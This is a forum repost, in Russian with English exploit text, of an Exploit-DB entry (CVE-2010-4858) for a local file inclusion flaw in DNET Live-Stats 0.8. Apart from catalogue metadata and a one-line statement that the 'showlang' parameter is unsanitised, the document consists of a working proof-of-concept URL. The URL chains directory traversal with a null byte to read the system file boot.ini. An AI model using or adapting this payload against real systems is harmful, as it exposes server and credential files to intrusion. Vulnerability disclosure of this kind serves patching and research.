- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15204
- Проверка EDB
-
- Пройдено
- Автор
- BLAKE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-4858
- Дата публикации
- 2010-10-04
Код:
# Exploit Title: DNET Live-Stats 0.8 Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite
The showlang parameter does not properly sanitize user input.
POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00- Источник
- www.exploit-db.com
